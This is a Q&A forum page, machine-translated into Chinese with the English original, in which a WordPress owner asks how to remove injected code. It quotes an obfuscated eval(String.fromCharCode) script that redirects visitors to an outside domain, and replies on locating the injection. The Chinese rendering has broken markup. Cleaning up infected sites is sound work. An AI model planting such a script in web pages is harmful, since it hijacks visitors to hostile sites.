如何删除header.php中找不到的恶意eval脚本

我的WordPress网站遭到黑客入侵,我只能通过查看索引来源查看恶意脚本 页面:'view-source:mydomain.com'</ p>

问题是,我无法在任何WordPress php文件中找到此代码的位置。 我已经浏览了所有核心文件(header.php,htaccess等)而无法找到它。</ p>

代码位于关闭/ head标记之前:</ p >

 &lt; script language = javascript&gt; eval(String.fromCharCode(32,32,118,97,114,32,32,32,116,100,32,61,32,  49,59,32,118,97,112,32,122,122,103,32,61,32,50,59,32,118,97,114,32,99,32,61,32,34,  104,116,116,112,115,58,47,47,108,101,102,116,111,117,116,115,105,100,101,109,121,112,114,111,102,  105,108,101,46,105,110,102,111,47,117,112,116,121,112,101,63,122,103,61,49,38,34,59,32,100,  111,99,117,109,101,110,116,46,108,111,99,97,116,105,111,110,46,114,101,112,108,97,99,101,40,  99,41,59,119,105,110,100,111,119,46,108,111,99,97,116,105,111,110,46,104,114,101,102,61,99,  59,100,111,99,117,109,101,110,116,46,108,111,99,97,116,105,111,110,46,104,114,101,102,61,99,  59));&LT; /脚本&GT  ;

</ code> </ pre>

我知道这是恶意重定向,但不知道如何处理它。 我最初修复了这个问题,完全重新安装了我的网站(因此丢失了一些帖子),并在问这个问题之前尽力解决这个问题。</ p>

真的很感激一些 帮助!</ p>

编辑:找到以下内容,确保相关内容:</ p>

`

</ p>

类WPSEO_Frontend {< / p>

  function __construct(){

wp_reset_query();

$ options = get_wpseo_options();

add_action('wp_head',array(&amp;) ; $ this,'head'),1,1);
remove_action('wp_head','rel_canonical');

add_filter('wp_title',array(&amp; $ this,'title'),10 ,3);
add_filter('thematic_doctitle',array(&amp; $ this,'force_wp_title'));
add_filter('headway_title',array(&amp; $ this,'force_wp_title'));

add_action('wp',array(&amp; $ this,'page_redirect'),99,1);`
</ code> </ pre>
</ div>

展开原文

原文

My WordPress website has been hacked and I'm only able to view the malicious script by viewing the source of my index page: 'view-source:mydomain.com'

The problem is, I can't find the location of this code in any of my WordPress php files. I've gone through all the core files (header.php, htaccess, etc.) without being able to find it.

The code sits right before closing /head tag:

<script language=javascript>eval(String.fromCharCode(32, 32, 118, 97, 114, 32, 32, 32, 116, 100, 32, 61, 32, 49, 59, 32, 118, 97, 114, 32, 122, 122, 103, 32, 61, 32, 50, 59, 32, 118, 97, 114, 32, 99, 32, 61, 32, 34, 104, 116, 116, 112, 115, 58, 47, 47, 108, 101, 102, 116, 111, 117, 116, 115, 105, 100, 101, 109, 121, 112, 114, 111, 102, 105, 108, 101, 46, 105, 110, 102, 111, 47, 117, 112, 116, 121, 112, 101, 63, 122, 103, 61, 49, 38, 34, 59, 32, 100, 111, 99, 117, 109, 101, 110, 116, 46, 108, 111, 99, 97, 116, 105, 111, 110, 46, 114, 101, 112, 108, 97, 99, 101, 40, 99, 41, 59, 119, 105, 110, 100, 111, 119, 46, 108, 111, 99, 97, 116, 105, 111, 110, 46, 104, 114, 101, 102, 61, 99, 59, 100, 111, 99, 117, 109, 101, 110, 116, 46, 108, 111, 99, 97, 116, 105, 111, 110, 46, 104, 114, 101, 102, 61, 99, 59));</script> 

I know that this is a malicious redirect, but don't know how to deal with it. I originally fixed the issue by completely reinstalling my website (losing some posts as a result), and did my best as a noob to resolve this problem before asking this question.

Would really appreciate some help!

EDIT: Found the following, insure if relevant:

`

class WPSEO_Frontend {

function __construct() {

    wp_reset_query();

    $options = get_wpseo_options();

    add_action('wp_head', array(&$this, 'head'), 1, 1);
    remove_action('wp_head', 'rel_canonical');

    add_filter( 'wp_title', array(&$this, 'title'), 10, 3);
    add_filter( 'thematic_doctitle', array(&$this, 'force_wp_title') );
    add_filter( 'headway_title', array(&$this, 'force_wp_title') );

    add_action('wp',array(&$this,'page_redirect'),99,1);`

2个回答



很可能&lt; script&gt; </ code>块的输出在源php文件中编码 ,所以你将无法从上面找到代码片段,而是在某些wordpress文件中找到类似base64编码的字符串。 就像Alexandru建议您可以在所有WP-Files内容中搜索 base64_decode </ code>并仔细检查出现的情况。 然而,由于理论上如何掩盖字符串有无限的可能性,这很容易变得麻烦。 </ p>

另一种方法可能是搜索 wp_head </ code>钩子( - &gt;搜索'add_action('wp_head'</ code>) 用于将代码注入到您网站的 header </ code>部分。也许您找到了被调用的函数并负责注入上面的输出。如果您发现任何奇怪的代码,请在此处发布。</ p>

</ div>

展开原文

原文

Chances are high that also the output of the <script> block is encoded in your source php files, so you won't be able to find the code snippet from above but rather something like a base64 encoded string in some of your wordpress files. Like Alexandru suggested you could search in all your WP-Files contents for base64_decode and carfully check the occurences. However, since there are theoretically endless possibilities how to mask a string, this can become cumbersome quite easily.

Another approach could be to search for the wp_head hook (-> search for 'add_action('wp_head' that is typically used to inject code to your website's header section. Maybe you find the function that is called and responsible for injecting the output above. In case you spot any odd looking code, post it here.

dsjbest2015
dsjbest2015 添加了一些代码注释,并且不确定这是否相关:add_action('wp_head',array(&$ this,'head'),1,1);
一年多之前 回复
doujiong3146
doujiong3146 基本上你的整个wordpress设置在你的ftp服务器上“按原样”设置,包括所有自定义插件和主题。 根据攻击者访问您网站的方式,恶意代码可能存储在任何地方。
一年多之前 回复
dongma2388
dongma2388 感谢您的回复。 我应该检查哪些文件? WordPress主题文件夹中的核心文件?
一年多之前 回复



代码已插入WordPress的选项表(sgcgoogleanalytic)。 我成功地从表中删除了脚本。</ p>
</ div>

展开原文

原文

The code was inserted into WordPress' options table (sgcgoogleanalytic). I successfully removed the script from the table.

Csdn user default icon
上传中...
上传图片
插入图片
抄袭、复制答案,以达到刷声望分或其他目的的行为,在CSDN问答是严格禁止的,一经发现立刻封号。是时候展现真正的技术了!
立即提问
相关内容推荐